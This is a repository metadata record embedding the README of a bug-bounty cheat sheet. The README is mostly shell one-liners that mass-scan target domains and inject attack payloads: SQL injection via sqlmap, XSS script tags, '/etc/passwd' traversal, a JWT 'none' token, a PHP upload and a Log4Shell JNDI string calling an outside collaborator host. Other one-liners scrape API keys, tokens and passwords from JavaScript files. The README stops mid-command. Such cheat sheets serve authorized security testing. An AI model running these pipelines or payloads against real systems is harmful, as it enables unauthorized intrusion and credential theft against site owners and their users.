{"id":26067387,"url":"https://github.com/yogsec/onelinerbounty","last_synced_at":"2026-03-07T18:31:06.422Z","repository":{"id":281067084,"uuid":"944099168","full_name":"yogsec/OneLinerBounty","owner":"yogsec","description":"OneLinerBounty is a collection of quick, actionable bug bounty tips in one-liner format. Perfect for bug hunters looking to boost their skills and efficiency. Contribute your own tips or use these to streamline your workflow and uncover more vulnerabilities.  #BugBounty #Cybersecurity #HackTips #SecurityResearch #OneLinerBugBounty #OneLinerBounty","archived":false,"fork":false,"pushed_at":"2026-01-25T10:50:56.000Z","size":13796,"stargazers_count":55,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"main","last_synced_at":"2026-01-26T01:36:14.863Z","etag":null,"topics":["bug","bugbounty","bugbountytips","burp-extensions","burpsuite","cyber-security","cybersecurity","cybersecurity-tools","cybersecuritytips","ethicalhacking","hacker","hackerone","hackers","hacking","hacking-tools","nmap","onelinerbugbounty","osint","owasp"],"latest_commit_sha":null,"homepage":"https://linktr.ee/yogsec","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yogsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":"yogsec","tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"lfx_crowdfunding":null,"polar":n
ull,"buy_me_a_coffee":null,"thanks_dev":null,"custom":null}},"created_at":"2025-03-06T19:31:49.000Z","updated_at":"2026-01-25T10:51:00.000Z","dependencies_parsed_at":"2025-03-06T20:38:47.105Z","dependency_job_id":null,"html_url":"https://github.com/yogsec/OneLinerBounty","commit_stats":null,"previous_names":["yogsec/onelinerbounty"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/yogsec/OneLinerBounty","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yogsec","download_url":"https://codeload.github.com/yogsec/OneLinerBounty/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOneLinerBounty/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30226245,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-07T18:12:09.766Z","status":"ssl_error","status_checked_at":"2026-03-07T18:11:58.786Z","response_time":53,"last_error":"SSL_read: unexpected eof while 
reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug","bugbounty","bugbountytips","burp-extensions","burpsuite","cyber-security","cybersecurity","cybersecurity-tools","cybersecuritytips","ethicalhacking","hacker","hackerone","hackers","hacking","hacking-tools","nmap","onelinerbugbounty","osint","owasp"],"created_at":"2025-03-08T21:44:22.829Z","updated_at":"2026-03-07T18:31:06.226Z","avatar_url":"https://github.com/yogsec.png","language":null,"readme":"  \u003ch1\u003e  # One Liner Bug Bounty CheatSheet 🚀\u003c/h1\u003e\n\nThis repository is a collection of concise, actionable bug bounty tips, each carefully crafted into a single line. Whether you're just getting started or you're a seasoned bug hunter, these tips will help you level up your skills, save time, and uncover more vulnerabilities. 💡\n\n## Why OneLiners?\n\nIn the world of bug bounty hunting, time is precious. Short, impactful tips can make all the difference. Here, you'll find quick insights that can easily be referenced when you're diving into a new target, testing a feature, or looking to refine your methodology. 🔍\n\n---\n\n
# OneLinerBounty\n\n## Quick Bug Bounty Tips\n\nHere are some essential one-liners for various bug bounty tasks:\n\n### Misconfigurations, Tech Detection, and Common Bugs\nIf you want wider coverage, like misconfigurations, tech detection, and common bugs, change the template path to `-t vulnerabilities/`:\n\n```bash\ncat urls.txt | httpx -silent -mc 200 | nuclei -silent -t vulnerabilities/ -o results.txt\n```\n\n### Subdomain Takeovers - Quick Check\nWant to check for subdomain takeovers in one line?\n\n```bash\nsubfinder -d example.com | httpx -silent | nuclei -silent -t takeovers/ -o takeover.txt\n```\n\n### Subdomain Discovery + Live Check\nFor subdomain discovery with live check:\n\n```bash\nsubfinder -d target.com | httpx -silent -mc 200\n```\n\n### Subdomain Takeover Detection\nDetect subdomain takeovers:\n\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/\n```\n\n### Directory Bruteforce (Content Discovery)\nFor directory bruteforce:\n\n```bash\nffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200\n```\n\n### Find Open Redirects (Quick Scan)\nTo quickly find open redirects:\n\n```bash\ncat 
urls.txt | gf redirect | httpx -silent\n```\n\n### XSS Detection (Using Dalfox)\nFor XSS detection using Dalfox:\n\n```bash\ncat urls.txt | dalfox pipe --skip-bav --only-poc\n```\n\n### SQL Injection Discovery\nFor SQL Injection discovery:\n\n```bash\ncat urls.txt | gf sqli | sqlmap --batch --random-agent -m -\n```\n\n### Find Sensitive Files (Backup, Config, etc.)\nTo find sensitive files like backups and configuration files:\n\n```bash\ncat urls.txt | waybackurls | grep -Ei '\\.(bak|old|backup|log|env|sql|config)$'\n```\n\n### CORS Misconfiguration Detection\nTo detect CORS misconfigurations:\n\n```bash\ncat urls.txt | corscanner\n```\n\n### Detect Technologies + Possible CVEs\nTo detect technologies and possible CVEs:\n\n```bash\ncat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/\n```\n\n### Parameter Discovery (for further testing)\nTo discover parameters for 
further testing:\n\n```bash\ncat urls.txt | waybackurls | uro | grep '?'\n```\n\n### Full Recon Chain (Subdomains + Live Check + Technologies + Titles)\nFor full recon chain:\n\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect\n```\n\n### Subdomain Enum + Ports Scan (Fast)\nFor a fast subdomain enumeration and port scan:\n\n```bash\nsubfinder -d target.com | naabu -silent -top-ports 1000\n```\n\n### All URLs from Wayback, CommonCrawl, and AlienVault\nTo get all URLs from Wayback, CommonCrawl, and AlienVault:\n\n```bash\ngau target.com | tee urls.txt\n```\n\n### Find Secrets in JS Files\nTo find secrets in JS files:\n\n```bash\ncat urls.txt | grep '\\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | tr \"[:space:]\" \"\\n\" | grep -Ei \"(api|key|token|secret|password|passwd|authorization)=\"'\n```\n\n### Find Open AWS Buckets\nTo find open AWS buckets:\n\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t s3-detect.yaml\n```\n\n### Find Misconfigured Login Panels\nTo find misconfigured login panels:\n\n```bash\ncat urls.txt | nuclei -silent -t exposed-panels/\n```\n\n### Check All Parameters for Reflected XSS\nTo check all parameters for reflected XSS:\n\n```bash\ncat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc\n```\n\n### Check for Exposed Git Repositories\nTo check for exposed Git repositories:\n\n```bash\ncat urls.txt | httpx -silent -path \"/.git/config\" -mc 200\n```\n\n### Extract All Parameters from URLs (for manual testing)\nTo extract all parameters from URLs for manual testing:\n\n```bash\ncat urls.txt | uro | grep '?'\n```\n\n### Takeover Domains from Subdomain List\nTo perform takeover checks on domains from a subdomain list:\n\n```bash\ncat subdomains.txt | nuclei -silent -t takeovers/\n```\n\n### Find CVEs Based on Technology\nTo find CVEs based on technology:\n\n```bash\ncat urls.txt | httpx -silent -title -tech-detect | nuclei -silent -t cves/\n```\n\n### Find Top Ports + Services for All 
Subdomains (Recon + Port Scan)\nTo find the top ports and services for all subdomains:\n\n```bash\nsubfinder -d target.com | naabu -top-ports 1000 -silent\n```\n\n### Extract All Endpoints from JS Files (JS Analysis)\nTo extract all endpoints from JS files for analysis:\n\n```bash\ncat urls.txt | grep '\\.js$' | httpx -silent | xargs -I{} bash -c 'curl -s {} | grep -oE \"(/api/v[0-9]+/[^\\\"'\\'']+|/[a-zA-Z0-9_/.-]+\\.(php|aspx|jsp|html|json|xml|txt))\"'\n```\n\n### Scan for Backup Files (Old Config/DB Dumps)\nTo scan for backup files, old config, or DB dumps:\n\n```bash\ncat urls.txt | httpx -silent -path-list \u003c(echo -e \"/.env\\n/config.php\\n/backup.zip\\n/database.sql\\n/admin.bak\") -mc 200\n```\n\n### Find Open .git Folders (Source Leak)\nTo find open `.git` folders:\n\n```bash\ncat subdomains.txt | httpx -silent -path \"/.git/config\" -mc 200\n```\n\n### WordPress Scan (Detect Plugins, Themes, etc.)\nFor WordPress scan to detect plugins, themes, etc.:\n\n```bash\ncat urls.txt | nuclei -silent -t technologies/wordpress/\n```\n\n### Hunt for CRLF Injection (Newline Injection)\nTo hunt for CRLF injection:\n\n```bash\ncat urls.txt | gf crlf | qsreplace '%0d%0aTestHeader:TestValue' | httpx -silent -hdrs\n```\n\n### Detect CORS Misconfigurations (Very Common Bug)\nTo detect CORS misconfigurations:\n\n```bash\ncat urls.txt | corscanner\n```\n\n### Test All URLs for LFI (Local File Inclusion)\nTo test all URLs for LFI:\n\n```bash\ncat urls.txt | gf lfi | qsreplace '/etc/passwd' | httpx -silent -mc 200\n```\n\n### Find Information Disclosure via Backup Files\nTo find information disclosure via backup files:\n\n```bash\ncat urls.txt | waybackurls | grep -Ei '\\.(bak|old|backup|log|sql|env|zip|tar|gz|rar)$' | httpx -silent -mc 200\n```\n\n### Find Exposed Panels (Admin, Login, etc.)\nTo find exposed admin/login panels:\n\n```bash\ncat urls.txt | nuclei -silent -t exposed-panels/\n```\n\n### Full JS Hunting + Secrets Scan (for frontend leaks)\nFor full JS hunting and secrets scan:\n\n```bash\ngau target.com | 
grep '\\.js$' | httpx -silent | xargs -I{} bash -c 'echo {} \u0026\u0026 curl -s {} | tr -d \"\\r\" | grep -E -i \"(api[_-]?key|secret|token|auth|password|passwd|client[_-]?id|client[_-]?secret)=\"'\n```\n\n### Search for Open Redirects (URL Redirect issues)\nTo search for open redirects:\n\n```bash\ncat urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -mc 302,301 -fr 'evil.com'\n```\n\n### Quick Scan for SQL Injection\nFor a quick SQL injection scan:\n\n```bash\ncat urls.txt | gf sqli | sqlmap --batch --random-agent -m -\n```\n\n### Find Interesting Endpoints (Like admin, login, debug, etc.)\nTo find interesting endpoints like admin, login, debug, etc.:\n\n```bash\ngau target.com | grep -Ei '/(admin|login|debug|test|backup|panel|dashboard)'\n```\n\n### Check for Exposed Config Files (like .env, .git, .DS_Store)\nTo check for exposed config files:\n\n```bash\ncat urls.txt | httpx -silent -path-list \u003c(echo -e '/.env\\n/.git/config\\n/.DS_Store\\n/config.php\\n/config.json') -mc 200\n```\n\n### Scan for CVE in All Subdomains\nTo scan for CVEs in all subdomains:\n\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t cves/\n```\n\n### Full Backup File Search (All extensions that leak data)\nTo search for all extensions that leak backup files:\n\n```bash\ngau target.com | grep -Ei '\\.(bak|old|backup|sql|log|tar|zip|gz|rar|swp|env|config)$' | httpx -silent -mc 200\n```\n\n### Check for CORS Misconfigurations\nTo check for CORS misconfigurations:\n\n```bash\ncat urls.txt | corscanner\n```\n\n### Scan for Open Admin Panels (Exposed Panels)\n```bash\ncat urls.txt | nuclei -silent -t exposed-panels/\n```\n\n### ALL-IN-ONE MEGA SCAN 💣 (Subdomain + Alive + CVE Scan + Panels)\n```bash\nsubfinder -d target.com | httpx -silent -mc 200 | tee alive.txt | nuclei -silent -t cves/,exposed-panels/\n```\n\n### All-in-One Recon Pipeline (Subdomains → Probing → Ports → Tech Detection → Titles)\n```bash\nsubfinder -d target.com | anew subs.txt 
\u0026\u0026 cat subs.txt | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | anew alive.txt\n```\n\n### Mass Fetch JS Files + Find Secrets + Endpoints + Tokens\n```bash\ncat alive.txt | hakrawler -subs | grep '\\.js$' | anew jsfiles.txt \u0026\u0026 cat jsfiles.txt | xargs -I{} bash -c 'curl -s {} | tr -d \"\\r\" | egrep -i \"(api|key|token|secret|password|passwd|authorization|bearer|client_id|client_secret)\"' | tee secrets.txt\n```\n\n### Check for Open Redirects Across All Params (with Payload Injection)\n```bash\ncat alive.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -mc 302,301\n```\n\n### Automatic Vulnerability Scan (Subdomains to CVE Detection + Misconfigs)\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t cves/,misconfiguration/\n```\n\n### Backup Files Bruteforce Across All Hosts\n```bash\ncat alive.txt | httpx -silent -path-list \u003c(echo -e \"/.git/config\\n/.env\\n/database.sql\\n/backup.zip\\n/config.php\\n/wp-config.php\") -mc 200 | tee backups.txt\n```\n\n### Check for Parameter-Based XSS (Direct Injection Testing)\n```bash\ncat alive.txt | hakrawler -subs -depth 2 | gf xss | qsreplace '\"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e' | httpx -silent -fr 'alert(document.domain)'\n```\n\n### Automated LFI Discovery (Common Payloads)\n```bash\ncat alive.txt | gf lfi | qsreplace '../../../../../../etc/passwd' | httpx -silent -mc 200\n```\n\n### Fuzz Parameters \u0026 Check Reflections (for XSS \u0026 Injection Discovery)\n```bash\ncat alive.txt | waybackurls | gf params | uro | qsreplace FUZZ | ffuf -u FUZZ -w wordlists/payloads/xss.txt -fr 'FUZZ'\n```\n\n### Subdomain Takeover Detection (Live Scan + Detection)\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/\n```\n\n### Full Asset Discovery + Technology Analysis + Title Collection\n```bash\nassetfinder --subs-only target.com | httpx -silent -title -tech-detect | tee 
assets_with_tech.txt\n```\n\n### Mega Pipeline - Subdomains → URLs → Parameters → XSS/SQL/Secrets\n```bash\nsubfinder -d target.com | anew subs.txt \u0026\u0026 cat subs.txt | httpx -silent | hakrawler -subs -depth 2 | anew urls.txt \u0026\u0026 cat urls.txt | gf xss | dalfox pipe --skip-bav --only-poc | tee xss_poc.txt \u0026\u0026 cat urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | egrep -i \"(api|key|token|secret|password|passwd|auth)\"' | tee secrets.txt\n```\n\n### Ultimate Recon Monster (Subdomains → Probing → Ports → Technologies → CVEs)\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee tech_scan.txt \u0026\u0026 cat tech_scan.txt | nuclei -silent -t cves/\n```\n\n### Automated Asset Hunting + JS Analysis + Secret Finder\n```bash\nsubfinder -d target.com | httpx -silent -mc 200 | hakrawler -subs -depth 3 -plain | anew urls.txt \u0026\u0026 cat urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | tr -d \"\\r\" | gf secrets | tee -a secrets.txt'\n```\n\n### Mass Fuzz Every Parameter with XSS, LFI, SQLi Payloads (Ultimate Param Attacker)\n```bash\ncat urls.txt | gf xss,lfi,sqli | uro | qsreplace FUZZ | ffuf -u FUZZ -w xss.txt,lfi.txt,sqli.txt -fr \"FUZZ\" | tee param_fuzz.txt\n```\n\n### Subdomain Takeover, DNS Hijack, Misconfig Scan - All In One\n```bash\nsubfinder -d target.com | dnsx -a -resp-only -silent | nuclei -silent -t takeovers/,dns/\n```\n\n### Automatic Full Backup File Bruteforcing Across All Hosts (Super Leaks Finder)\n```bash\nsubfinder -d target.com | httpx -silent | anew alive.txt \u0026\u0026 cat alive.txt | httpx -silent -path-list \u003c(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/backup.txt) -mc 200 | tee backups_found.txt\n```\n\n### Deep Directory Brute Force (Smart Recursive Finder)\n```bash\nsubfinder -d target.com | httpx -silent | anew alive.txt \u0026\u0026 cat alive.txt | xargs -I{} gobuster dir -u {} -w 
big_wordlist.txt -t 50 -o gobuster_output.txt\n```\n\n### Blind SSRF Auto-Detection in All Parameters\n```bash\ncat urls.txt | gf ssrf | qsreplace 'http://canarytoken.com' | httpx -silent -mc 200 -fr 'canarytoken'\n```\n\n### Mega Wordlist Generator from Wayback + JS + HTML Comments + Robots.txt + Sitemap.xml\n```bash\nsubfinder -d target.com | httpx -silent | anew alive.txt \u0026\u0026 cat alive.txt | hakrawler -subs -depth 2 | anew urls.txt \u0026\u0026 cat urls.txt | gf wordlist | anew wordlist.txt\n```\n\n### Full Sitemap \u0026 Robots Extraction Across Subdomains\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(echo -e \"/robots.txt\\n/sitemap.xml\") -mc 200 | tee robots_sitemaps.txt\n```\n\n### CRLF Injection Full Auto Discovery \u0026 Exploit\n```bash\ncat urls.txt | gf crlf | qsreplace '%0d%0aTest-Header: InjectedValue' | httpx -silent -hdrs | tee crlf_vulns.txt\n```\n\n### CSP Analyzer Across All Hosts (Misconfig Finder)\n```bash\ncat alive.txt | httpx -silent -path / -mc 200 -hdrs | grep -i 'content-security-policy' | tee csp_misconfig.txt\n```\n\n### Full JS Endpoint Extraction + Sensitive Function Search (eval, document.write, etc.)\n```bash\ncat urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | grep -E -o \"(http|https)://[^\\\" ]+\" | anew js_endpoints.txt \u0026\u0026 curl -s {} | egrep -i \"(document\\.write|eval|innerHTML|fetch|XMLHttpRequest|localStorage|sessionStorage|cookie)\" | tee -a sensitive_js.txt'\n```\n\n### Recon + Full Vuln Scan + CORS, Headers, CVE, Misconfig, Secrets — One Command to Rule Them All\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee alive.txt \u0026\u0026 cat alive.txt | nuclei -silent -t cves/,misconfiguration/,exposures/,default-logins/,panels/ | tee findings.txt \u0026\u0026 cat alive.txt | hakrawler -subs -depth 3 | anew urls.txt \u0026\u0026 cat urls.txt | gf xss,sqli,lfi,ssrf | dalfox pipe --skip-bav --only-poc | tee vulns.txt 
\u0026\u0026 cat urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | tr -d \"\\r\" | gf secrets' | tee secrets_found.txt\n```\n\n### Subdomain Takeover + Open Redirect Chain (Full Passive → Exploit Ready)\n```bash\nsubfinder -d target.com | httpx -silent | nuclei -silent -t takeovers/,redirect/ -o takeover_redirects.txt\n```\n\n### Full Parameter Discovery + Automated Fuzzing (XSS, SQLi, LFI, SSRF)\n```bash\ngau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr \"FUZZ\" | tee param_vulns.txt\n```\n\n### Auto Search for Backup Files + Leaked Configs (All Subdomains)\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/backup.txt) -mc 200 | tee backup_leaks.txt\n```\n\n### Deep Web Archive Scraping + JS Secrets Extraction\n```bash\ngau --subs target.com | grep '\\.js$' | httpx -silent -status-code -mc 200 | xargs -I{} bash -c 'curl -s {} | gf secrets' | tee js_secrets.txt\n```\n\n### Auto-Dump All Endpoints from Wayback, JS, Robots.txt, Sitemap.xml\n```bash\nsubfinder -d target.com | anew subs.txt \u0026\u0026 cat subs.txt | httpx -silent -path-list \u003c(echo -e \"/robots.txt\\n/sitemap.xml\") -mc 200 | hakrawler -subs -depth 3 | anew all_urls.txt\n```\n\n### CSP Bypass Finder (Auto Fetch CSP Across All Subdomains)\n```bash\nsubfinder -d target.com | httpx -silent -path / -mc 200 -hdrs | grep -i 'content-security-policy' | tee csp_policies.txt\n```\n\n### Automatic SSRF Detection (Using Collaborator/Canarytokens)\n```bash\ngau target.com | gf ssrf | qsreplace 'http://your-collaborator-url.burpcollaborator.net' | httpx -silent\n```\n\n### Deep Search for Hidden Panels + Config Pages (Across All Ports)\n```bash\nsubfinder -d target.com | httpx -silent -ports 80,443,8080,8443 | nuclei -silent -t panels/,exposures/configs/ -o exposed_panels.txt\n```\n\n### 
Entire Subdomain + Tech Stack + CVE + Misconfig Scan (Full Recon Bomb)\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | nuclei -silent -t cves/,misconfiguration/ -o full_scan.txt\n```\n\n### Auto-Scrape HTML Comments for Sensitive Info\n```bash\ncat all_urls.txt | httpx -silent -mc 200 -fr 'text/html' -body | grep -iE \"\u003c!--.*--\u003e\" | tee html_comments.txt\n```\n\n### URL Extraction from JS Files (Full Recursive)\n```bash\ncat all_urls.txt | grep '\\.js$' | xargs -I{} bash -c 'curl -s {} | grep -Eo \"(https?|ftp)://[a-zA-Z0-9./?=_-]*\"' | anew extracted_urls.txt\n```\n\n### Super Bruteforce for Backup + Git + Env + SQL Dumps\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(echo -e \"/.git/\\n/.env\\n/database.sql\\n/backup.zip\\n/config.yml\") -mc 200 | tee sensitive_files.txt\n```\n\n### Advanced Open Redirect Scanner Across All Params\n```bash\ncat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt\n```\n\n### Full Headers Security Misconfig Audit\n```bash\nsubfinder -d target.com | httpx -silent -path / -mc 200 -hdrs | nuclei -silent -t misconfiguration/http-headers/ -o header_issues.txt\n```\n\n### Auto-Gather All IPs, ASN, WHOIS for Every Subdomain\n```bash\nsubfinder -d target.com | dnsx -a -resp-only | anew all_ips.txt \u0026\u0026 cat all_ips.txt | xargs -I{} sh -c 'whois {} | grep -iE \"OrgName|NetName|CIDR\"' | tee whois_lookup.txt\n```\n\n### Master Recon + Scan Pipeline (One-Liner)\n```bash\nsubfinder -d target.com | tee subs.txt \u0026\u0026 cat subs.txt | httpx -silent -title -tech-detect -ports 80,443,8080,8443 | tee tech_info.txt \u0026\u0026 cat subs.txt | hakrawler -subs -depth 3 | anew urls.txt \u0026\u0026 cat urls.txt | nuclei -silent -t cves/,misconfiguration/,takeovers/,panels/,redirect/ -o nuclei_findings.txt \u0026\u0026 cat urls.txt | gf xss,sqli,lfi,ssrf,redirect | qsreplace FUZZ | ffuf -u FUZZ -w 
payloads/xss.txt,payloads/sqli.txt,payloads/lfi.txt,payloads/ssrf.txt -fr \"FUZZ\" | tee param_scan.txt\n```\n\n### Additional Specific Recon + Vulnerability Scanning Commands\n\n#### Directory Traversal (Across All Endpoints)\n```bash\ncat all_urls.txt | gf lfi | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x' -o traversal_hits.txt\n```\n\n#### Exposed Git Repos Finder (Automated)\n```bash\nsubfinder -d target.com | httpx -silent -path /.git/HEAD -mc 200 -o exposed_git.txt\n```\n\n#### IDOR Discovery (Bruteforce Parameter Tampering)\n```bash\ncat all_urls.txt | gf idor | qsreplace 'id=123' | anew idor_urls.txt \u0026\u0026 qsreplace 'id=124' | httpx -silent -mc 200 -o possible_idor.txt\n```\n\n#### JWT Token Misconfig (None Algorithm)\n```bash\ncat all_urls.txt | grep -Ei 'jwt|token' | qsreplace 'eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -mc 200 -o jwt_none.txt\n```\n\n#### Unrestricted File Upload (Testing Common Upload Points)\n```bash\ncat all_urls.txt | gf upload | qsreplace 'file=payload.php' | httpx -silent -upload-file payload.php -o upload_findings.txt\n```\n\n#### Path Confusion + Overlays (Detect Double Extensions)\n```bash\ncat all_urls.txt | sed 's/$/%00index.php/' | httpx -silent -mc 200 -o path_confusion.txt\n```\n\n#### CORS Wildcard + Credentials Misconfig\n```bash\nsubfinder -d target.com | httpx -silent -path / -H 'Origin: https://evil.com' -hdrs | grep -i 'access-control-allow-origin' | grep 'evil.com' | tee weak_cors.txt\n```\n\n#### Log4Shell Finder (Old but Gold)\n```bash\ncat all_urls.txt | gf ssrf | qsreplace '${jndi:ldap://your-collaborator-url.burpcollaborator.net}' | httpx -silent\n```\n\n#### Server Side Template Injection (SSTI Detection)\n```bash\ncat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_hits.txt\n```\n\n#### Prototype Pollution Detection (Direct \u0026 Indirect)\n```bash\ncat all_urls.txt | gf parameters | qsreplace '__proto__[exploit]=polluted' | httpx 
-silent -fr 'polluted' -o prototype_pollution.txt\n```\n\n#### Exposed Debug Pages (Stack Traces, Debug Consoles)\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(echo -e '/debug\\n/_profiler\\n/_debugbar\\n/_error') -mc 200 -o debug_pages.txt\n```\n\n#### Email Leaks in JS Files\n```bash\ncat all_urls.txt | grep '\\.js$' | xargs -I{} curl -s {} | grep -Eo \"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}\" | tee emails_found.txt\n```\n\n### Cloud Misconfig - Public S3 Buckets\n```bash\nsubfinder -d target.com | httpx -silent -path / -hdrs | grep -i 'x-amz-bucket-region' | tee public_s3.txt\n```\n\n### Exposed Admin Panels (Full Auto Discovery)\n```bash\nsubfinder -d target.com | httpx -silent -path-list \u003c(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/admin-panels.txt) -mc 200 -o exposed_admins.txt\n```\n\n### Mass Content Injection Check (Reflected Params)\n```bash\ncat all_urls.txt | gf xss | qsreplace '\u003cscript\u003ealert(1)\u003c/script\u003e' | httpx -silent -fr '\u003cscript\u003ealert(1)\u003c/script\u003e' -o reflected_xss.txt\n```\n\n### BONUS — Ultimate ALL Misconfig Scanner (Headers, Panels, Debug, Leaks)\n```bash\nsubfinder -d target.com | httpx -silent -title -tech-detect | nuclei -silent -t misconfiguration/ -o misconfigs_found.txt\n```\n\n### API Key Leaks in JS Files\n```bash\ncat all_js_urls.txt | xargs -I{} curl -s {} | grep -Eo 'AIza[0-9A-Za-z_-]{35}|sk_live_[0-9a-zA-Z]{24}' | tee leaked_api_keys.txt\n```\n\n### Backup Files Discovery (Think: .bak, .old, .swp)\n```bash\ncat all_urls.txt | sed -E 's/(.*)/\\1~\\n\\1.bak\\n\\1.old\\n\\1.swp/' | httpx -silent -mc 200 -o backup_files.txt\n```\n\n### PHP Unit RCE Finder (Real-World Gold)\n```bash\nsubfinder -d target.com | httpx -silent -path /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php -mc 200 -o phpunit_rce.txt\n```\n\n### GraphQL Misconfig Detection (Introspection Enabled)\n```bash\ncat all_urls.txt | grep 'graphql' 
| xargs -I{} curl -s -X POST -d '{\"query\":\"{__schema{types{name}}}\"}' {} | grep -iq 'types' \u0026\u0026 echo \"{} introspection enabled\" \u003e\u003e graphql_misconfigs.txt\n```\n\n### Host Header Injection\n```bash\ncat all_urls.txt | httpx -silent -H 'Host: evil.com' -hdrs | grep -i 'evil.com' | tee host_header_injection.txt\n```\n\n### Open Redirect Finder (Redirection Abuse)\n```bash\ncat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'https://evil.com' -o open_redirects.txt\n```\n\n### Session Fixation Detection\n```bash\ncat all_urls.txt | gf login | qsreplace 'sessionid=1234abcd' | httpx -silent -fr '1234abcd' -o session_fixation.txt\n```\n\n### Exposed .env Files (Sensitive Config Exposure)\n```bash\nsubfinder -d target.com | httpx -silent -path /.env -mc 200 -o exposed_env.txt\n```\n\n### SSRF Detection (Collaboration Automation)\n```bash\ncat all_urls.txt | gf ssrf | qsreplace 'http://your-collab-url.burpcollaborator.net' | httpx -silent\n```\n\n### CRLF Injection\n```bash\ncat all_urls.txt | gf crlf | qsreplace '%0D%0ASet-Cookie:crlf=found' | httpx -silent -fr 'crlf=found' -o crlf_injections.txt\n```\n\n### CMS Detection (for Known Exploits)\n```bash\nsubfinder -d target.com | httpx -silent -tech-detect -o cms_detected.txt\n```\n\n### Missing Security Headers (Easy Win)\n```bash\ncat all_urls.txt | httpx -silent -H 'X-Content-Type-Options' -H 'X-Frame-Options' -H 'Content-Security-Policy' -H 'Strict-Transport-Security' | grep -E \"missing|absent\" | tee weak_headers.txt\n```\n\n### Cache Poisoning Detection\n```bash\ncat all_urls.txt | gf cache | qsreplace 'X-Forwarded-Host: evil.com' | httpx -silent -fr 'evil.com' -o cache_poisoning.txt\n```\n\n### Client-Side Prototype Pollution\n```bash\ncat all_js_urls.txt | xargs -I{} curl -s {} | grep -E 'prototype|__proto__|constructor' | tee client_side_prototype.txt\n```\n\n### Sensitive Image Exposures (Backups/Logs)\n```bash\nsubfinder -d target.com | httpx -silent 
